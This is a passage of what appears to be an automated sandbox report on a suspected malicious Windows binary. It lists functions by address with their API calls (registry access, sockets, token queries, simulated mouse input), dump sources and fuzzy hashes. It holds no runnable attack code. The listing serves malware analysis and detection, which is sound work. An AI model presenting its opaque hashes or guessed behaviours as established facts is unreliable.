                      • Part of subcall function 00C71D35: GetStockObject.GDI32(00000011), ref: 00C71D87
                      • Part of subcall function 00C71D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C71D91
                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00CF78A1
                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00CF78AE
                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00CF78B9
                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00CF78C8
                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00CF78D4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$CreateObjectStockWindow
                    • String ID: Msctls_Progress32
                    • API String ID: 1025951953-3636473452
                    • Opcode ID: 947ac3980adceae3501616f31ffdc62a88a8be48fd93b640ada4b450758947ae
                    • Instruction ID: 2e7de4846ddf648eaab3c84969b66f98fd48447ac926dd45058fb321a87f6a61
                    • Opcode Fuzzy Hash: 947ac3980adceae3501616f31ffdc62a88a8be48fd93b640ada4b450758947ae
                    • Instruction Fuzzy Hash: 8C1151B155021DBEEF159F64CC85EE77F6DEF08798F014115BB14A6090C7719C21DBA4
                    Function 00C941C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00C941E3
                    • GetProcAddress.KERNEL32(00000000), ref: 00C941EA
                    • RtlEncodePointer.NTDLL(00000000), ref: 00C941F6
                    • RtlDecodePointer.NTDLL(00000001), ref: 00C94213
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoInitialize$combase.dll
                    • API String ID: 3489934621-340411864
                    • Opcode ID: 44de48561748457df6a5e2050ad9792980046c901a4219579c5e37395122a814
                    • Instruction ID: 590a1353689186933da3bb32291b693387eba0135c777af56ea6ba201535adb0
                    • Opcode Fuzzy Hash: 44de48561748457df6a5e2050ad9792980046c901a4219579c5e37395122a814
                    • Instruction Fuzzy Hash: 8DE0EDB09917409EDF105B70EC4DB3836A4FB11702F104428B421D51F0D7F95496CA21
                    Function 00C9429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00C941B8), ref: 00C942B8
                    • GetProcAddress.KERNEL32(00000000), ref: 00C942BF
                    • RtlEncodePointer.NTDLL(00000000), ref: 00C942CA
                    • RtlDecodePointer.NTDLL(00C941B8), ref: 00C942E5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoUninitialize$combase.dll
                    • API String ID: 3489934621-2819208100
                    • Opcode ID: 07a8fa067d8dfc7322c5ab443e9ea3433ed3f83c45f6a8451a5fb139da1d9fd8
                    • Instruction ID: 6027ad79e8ebafe14a73a0f0f9b4653bef6b89c48d146ffcb5198dc7862a2b05
                    • Opcode Fuzzy Hash: 07a8fa067d8dfc7322c5ab443e9ea3433ed3f83c45f6a8451a5fb139da1d9fd8
                    • Instruction Fuzzy Hash: B0E0B678591B01AFEB149B60EC0DF2A3AA4FB24742F144028F011E12B0CBB8598ADA35
                    Function 00CE6E17 Relevance: 9.2, APIs: 6, Instructions: 250networkCOMMON
                    Download Yara Rule
                    APIs
                    • __WSAFDIsSet.WS2_32(00000000,?), ref: 00CE6F14
                    • WSAGetLastError.WS2_32(00000000), ref: 00CE6F48
                    • htons.WS2_32(?), ref: 00CE6FFE
                    • inet_ntoa.WS2_32(?), ref: 00CE6FBB
                      • Part of subcall function 00CCAE14: _strlen.LIBCMT ref: 00CCAE1E
                      • Part of subcall function 00CCAE14: _memmove.LIBCMT ref: 00CCAE40
                    • _strlen.LIBCMT ref: 00CE7058
                    • _memmove.LIBCMT ref: 00CE70C1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                    • String ID:
                    • API String ID: 3619996494-0
                    • Opcode ID: 8ff75dcdd4b27ddcba804e9bbd952bd2628c0bf18d92fd8d2575fe9bb79406b4
                    • Instruction ID: d6984f9b171750b68f7e438a48bb0ff9509f4cd485356a13439c8216376ecf56
                    • Opcode Fuzzy Hash: 8ff75dcdd4b27ddcba804e9bbd952bd2628c0bf18d92fd8d2575fe9bb79406b4
                    • Instruction Fuzzy Hash: 8981D131504340ABC710EB25CC85F6FB7A9EF84724F148A1DF65A9B2E2DB709E05DB92
                    Function 00CD675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memmove$__itow__swprintf
                    • String ID:
                    • API String ID: 3253778849-0
                    • Opcode ID: 0c075802fe2ce86c2298120689fc474de85c87cf01fda3a22c071ebc9f61edda
                    • Instruction ID: d98127c628d924e819527788c007d7632d26477155070a8c6da78b9bc78870cd
                    • Opcode Fuzzy Hash: 0c075802fe2ce86c2298120689fc474de85c87cf01fda3a22c071ebc9f61edda
                    • Instruction Fuzzy Hash: 2961DF3050065A9BDF11EF60CC86EFE3BA5EF44308F04855AFE5A5B292DB31AD01EB50
                    Function 00CF046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                      • Part of subcall function 00CF10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF0038,?,?), ref: 00CF10BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF0548
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CF0588
                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00CF05AB
                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00CF05D4
                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CF0617
                    • RegCloseKey.ADVAPI32(00000000), ref: 00CF0624
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                    • String ID:
                    • API String ID: 4046560759-0
                    • Opcode ID: fc101c4976018f6c507754a5b4362dbb52351a47782539f42c5be496589d4189
                    • Instruction ID: 429704289565a3fe62ff1ca79631690b69769f74fc74040f124f6bf8767f55cd
                    • Opcode Fuzzy Hash: fc101c4976018f6c507754a5b4362dbb52351a47782539f42c5be496589d4189
                    • Instruction Fuzzy Hash: 41515A31108204AFCB14EB54C885E7EBBE8FF84714F14892DFA55872A2DB71EA05EB52
                    Function 00CF5A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetMenu.USER32(?), ref: 00CF5A82
                    • GetMenuItemCount.USER32(00000000), ref: 00CF5AB9
                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00CF5AE1
                    • GetMenuItemID.USER32(?,?), ref: 00CF5B50
                    • GetSubMenu.USER32(?,?), ref: 00CF5B5E
                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00CF5BAF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Menu$Item$CountMessagePostString
                    • String ID:
                    • API String ID: 650687236-0
                    • Opcode ID: 4e2c6527a350c998e97cf65e071a3b1ef32dab1378dbb7981d757b0f77156140
                    • Instruction ID: 293adfbc78a13004a1a0d4d5c351dd0a72a049789a9131a101352e7e7cf26182
                    • Opcode Fuzzy Hash: 4e2c6527a350c998e97cf65e071a3b1ef32dab1378dbb7981d757b0f77156140
                    • Instruction Fuzzy Hash: 3B517F75A00619AFDF11EF64C845ABEBBB4EF48320F10446AEB15B7351CB70AE41DB92
                    Function 00CCF3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00CCF3F7
                    • VariantClear.OLEAUT32(00000013), ref: 00CCF469
                    • VariantClear.OLEAUT32(00000000), ref: 00CCF4C4
                    • _memmove.LIBCMT ref: 00CCF4EE
                    • VariantClear.OLEAUT32(?), ref: 00CCF53B
                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00CCF569
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Variant$Clear$ChangeInitType_memmove
                    • String ID:
                    • API String ID: 1101466143-0
                    • Opcode ID: cda5722b8ab83a0190a093f1bad067f35e19558f041376fb42e2dda32c3841c0
                    • Instruction ID: b8d9768cc27882ff733b9c71818f3b58693927a736b4445f8bddabed8bd2aef8
                    • Opcode Fuzzy Hash: cda5722b8ab83a0190a093f1bad067f35e19558f041376fb42e2dda32c3841c0
                    • Instruction Fuzzy Hash: E4515BB5A002099FCB14CF58D884EAAB7B9FF48314B15856DE959DB300D730E952CBA0
                    Function 00CD26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00CD2747
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CD2792
                    • IsMenu.USER32(00000000), ref: 00CD27B2
                    • CreatePopupMenu.USER32 ref: 00CD27E6
                    • GetMenuItemCount.USER32(000000FF), ref: 00CD2844
                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00CD2875
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                    • String ID:
                    • API String ID: 3311875123-0
                    • Opcode ID: bc04114deabffc1d86a816457ff63d94b584e67ad8ca800720ea1672a8ee9654
                    • Instruction ID: 0199663ae12168740273171e4e74dbe188d3230592064448e64132f7bb2021ba
                    • Opcode Fuzzy Hash: bc04114deabffc1d86a816457ff63d94b584e67ad8ca800720ea1672a8ee9654
                    • Instruction Fuzzy Hash: 8151A071A00245DBDF24CF68DC88BAEBBF5EF64314F10426AE6219B3D1D7709A05EB61
                    Function 00C71765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00C7179A
                    • GetWindowRect.USER32(?,?), ref: 00C717FE
                    • ScreenToClient.USER32(?,?), ref: 00C7181B
                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C7182C
                    • EndPaint.USER32(?,?), ref: 00C71876
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                    • String ID:
                    • API String ID: 1827037458-0
                    • Opcode ID: 521f889dd39219fdf6fd5ecaa03642f717e0da16372f08c3e8e0e41f8285e7e4
                    • Instruction ID: c387be0ea6eacb5e8137683ae5de02fdc52313c3ab86270a2c7597b94dc4cca5
                    • Opcode Fuzzy Hash: 521f889dd39219fdf6fd5ecaa03642f717e0da16372f08c3e8e0e41f8285e7e4
                    • Instruction Fuzzy Hash: 62416271104301AFD710DF29CC84B7A7BE8EB49724F188669F968C62E2C7719D45EB62
                    Function 00CFB958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                    Download Yara Rule
                    APIs
                    • ShowWindow.USER32(00D367B0,00000000,00882760,?,?,00D367B0,?,00CFB862,?,?), ref: 00CFB9CC
                    • EnableWindow.USER32(00000000,00000000), ref: 00CFB9F0
                    • ShowWindow.USER32(00D367B0,00000000,00882760,?,?,00D367B0,?,00CFB862,?,?), ref: 00CFBA50
                    • ShowWindow.USER32(00000000,00000004,?,00CFB862,?,?), ref: 00CFBA62
                    • EnableWindow.USER32(00000000,00000001), ref: 00CFBA86
                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00CFBAA9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$Show$Enable$MessageSend
                    • String ID:
                    • API String ID: 642888154-0
                    • Opcode ID: c67f25e41d8e3151c222597aabe7042702358268995e13282921beb615cf0d3b
                    • Instruction ID: 2d5aec41be376d7bc918a961262de7cc309d8eccdcf150ea4718e3c9bc458dac
                    • Opcode Fuzzy Hash: c67f25e41d8e3151c222597aabe7042702358268995e13282921beb615cf0d3b
                    • Instruction Fuzzy Hash: 9E414134600249AFDB61CF14C489BA97BF0FF05310F1841A9EB688F6A2C771EE46DB52
                    Function 00CE73B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00CE5134,?,?,00000000,00000001), ref: 00CE73BF
                      • Part of subcall function 00CE3C94: GetWindowRect.USER32(?,?), ref: 00CE3CA7
                    • GetDesktopWindow.USER32 ref: 00CE73E9
                    • GetWindowRect.USER32(00000000), ref: 00CE73F0
                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00CE7422
                      • Part of subcall function 00CD54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CD555E
                    • GetCursorPos.USER32(?), ref: 00CE744E
                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00CE74AC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                    • String ID:
                    • API String ID: 4137160315-0
                    • Opcode ID: 1ef27417ec5de40193ff72c61b0aa09ce4edf6f2db0698a08ad881865dbd3cd4
                    • Instruction ID: c56ad358b831714ddbbe4fc4bcdb138e6273e8ccb27983c21199db471e0e8619
                    • Opcode Fuzzy Hash: 1ef27417ec5de40193ff72c61b0aa09ce4edf6f2db0698a08ad881865dbd3cd4
                    • Instruction Fuzzy Hash: BB31D472508345ABD720DF15D849F5FBBA9FF88314F000A1AF59997191DB30EA09CB92
                    Function 00CCE0B5 Relevance: 9.1, APIs: 6, Instructions: 90memoryCOMMON
                    Download Yara Rule
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CCE0FA
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CCE120
                    • SysAllocString.OLEAUT32(00000000), ref: 00CCE123
                    • SysAllocString.OLEAUT32 ref: 00CCE144
                    • SysFreeString.OLEAUT32 ref: 00CCE14D
                    • SysAllocString.OLEAUT32(?), ref: 00CCE175
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: String$Alloc$ByteCharMultiWide$Free
                    • String ID:
                    • API String ID: 1313759350-0
                    • Opcode ID: a0305f1cea2073b0100661e72ade315129e92b0a77489891bcac04fd111cbfaf
                    • Instruction ID: 683f6a5a3a066a169e92dce88dc2e8c43266cd51bed8410afed9afa3e4820c3e
                    • Opcode Fuzzy Hash: a0305f1cea2073b0100661e72ade315129e92b0a77489891bcac04fd111cbfaf
                    • Instruction Fuzzy Hash: 92217136604108AF9B109FA9DC88EBF77ECEF0A760B148129F915CB2A1DA70DD41DB64
                    Function 00CDED8E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 323COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C79997: __itow.LIBCMT ref: 00C799C2
                      • Part of subcall function 00C79997: __swprintf.LIBCMT ref: 00C79A0C
                      • Part of subcall function 00C8FEC6: _wcscpy.LIBCMT ref: 00C8FEE9
                    • _wcstok.LIBCMT ref: 00CDEEFF
                    • _wcscpy.LIBCMT ref: 00CDEF8E
                    • _memset.LIBCMT ref: 00CDEFC1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                    • String ID: X
                    • API String ID: 774024439-3081909835
                    • Opcode ID: 9892a1a613fb7cf12d2e47a1bfd07c6c26c4493b2c45836a09c514a28a148d3c
                    • Instruction ID: e8c5323d9ff540ff038218e49ce7c5d756a3cc4cbab77d53b070e3f3c9389d24
                    • Opcode Fuzzy Hash: 9892a1a613fb7cf12d2e47a1bfd07c6c26c4493b2c45836a09c514a28a148d3c
                    • Instruction Fuzzy Hash: A3C13C715083409FC724EF24C885A6AB7E4FF85310F14892DF99A9B3A2DB70ED45DB92
                    Function 00CC8D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00CC85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00CC8608
                      • Part of subcall function 00CC85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00CC8612
                      • Part of subcall function 00CC85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00CC8621
                      • Part of subcall function 00CC85F1: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00CC8628
                      • Part of subcall function 00CC85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00CC863E
                    • GetLengthSid.ADVAPI32(?,00000000,00CC8977), ref: 00CC8DAC
                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00CC8DB8
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00CC8DBF
                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00CC8DD8
                    • GetProcessHeap.KERNEL32(00000000,00000000,00CC8977), ref: 00CC8DEC
